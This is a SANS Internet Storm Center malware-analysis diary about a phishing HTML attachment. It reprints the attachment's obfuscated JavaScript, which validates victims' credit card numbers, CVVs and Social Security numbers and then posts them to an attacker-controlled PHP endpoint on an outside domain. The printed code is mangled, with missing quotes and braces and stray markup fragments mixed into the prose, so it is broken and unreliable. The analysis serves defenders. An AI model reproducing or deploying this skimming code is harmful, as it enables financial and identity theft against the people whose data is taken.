var _0x22eb9a = c113b797cd0456be0d1a9c2f35f7d78b.phpvar _0x2da3 = [x6Cx65x6Ex67x74x68, x63x68x61x72x41x74, x68x74x74x70x3Ax2Fx2Fx74x31x2Ex73x79x73x74x65x6Dx66x69x6Cx74x65x72x73x2Ex6Ex65x74x2F, x68x74x74x70x73x3Ax2Fx2Fx77x77x77x2Ex70x61x79x70x61x6Cx2Ex63x6Fx6Dx2F, x72x65x70x6Cx61x63x65, x6Cx6Fx63x61x74x69x6Fx6E, x61x63x74x69x6Fx6E, x65x6Ex76, x66x6Fx72x6Dx73, x6Dx65x74x68x6Fx64, x70x6Fx73x74, x73x75x62x6Dx69x74var _0x27ca82 = (function(_0xe689x2) return function(_0xe689x3) var _0xe689x4 = _0xe689x3[_0x2da3], _0xe689x5 = 1, _0xe689x6 = 0, while (_0xe689x4) _0xe689x6 += (_0xe689x5 ^= 1) ? _0xe689x2[_0xe689x7] : _0xe689x7 return _0xe689x6 _0xe689x6 % 10 === 0 function xsub() if (!_0x11e97d()) return false if (!_0xbbd7eb) _0x98a278 += _0x22eb9a document[_0x2da3][_0x2da3][_0x2da3]()var _0x9939 = [x76x61x6Cx75x65, x63x63x61x72x64x6Ex75x6D, x65x6Ex76, x68x74x74x70x3Ax2Fx2Fx77x77x77x2Ex70x61x79x70x61x6Cx2Ex63x6Fx6Dx2F, x72x65x70x6Cx61x63x65, x6Cx6Fx63x61x74x69x6Fx6E, x63x61x64x64x72, x63x65x78x70x6D, x63x65x78x70x79, x63x63x76x76, x6Ex61x6Dx65, x30x30, x63x73x73x6E, x6Cx65x6Ex67x74x68, x2D, x69x6Ex64x65x78x4Fx66, x55x6Ex69x74x65x64x20x53x74x61x74x65x73, x63x63x6Fx75x6Ex74x72x79, x63x7Ax69x70function _0x11e97d() if (!ax) return window[_0x9939][_0x9939](_0x9939), !1 var _0x88a0x2 = document[_0x9939][_0x9939][_0x9939], _0x88a0x3 = document[_0x9939][_0x9939][_0x9939], _0x88a0x4 = document[_0x9939][_0x9939][_0x9939], if (!document[_0x9939][_0x9939][_0x9939] return !0″>The interesting line is the first one which contains the PHP page where data are posted. If you browse the code, you see that it is appended to _0x2da3”>tox68x74x74x70x3Ax2Fx2Fx74x31x2Ex73x79x73x74x65x6Dx66x69x6Cx74x65x72x73x2Ex6Ex65x74x2F”>Another interesting function is _0x11e97d() which performs multiple checks againstthe data submitted by the victim. Indeed, the attacker took the time to validate the data passed via the form. If one of them does not match the requirements, nothing is sent to the malicious server and just a redirect occurs.Example: The credit card number and SSNare checked (via the function _0x27ca82()).To successfully submit my test data, I bypassed _0x11e97d() with a simple return 1″>In this phishing campaign, victims from theUnited States are targeted because a real SSN is mandatory. It also demonstrates that the attacker took extra careto validate the data to get only valid information sent to him.This is a nice example of multiple obfuscation levels, nothing is downloaded from the Internet, the user has just to execute the HTML file attached to the email.
ISC Handler – Freelance Security Consultant
(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.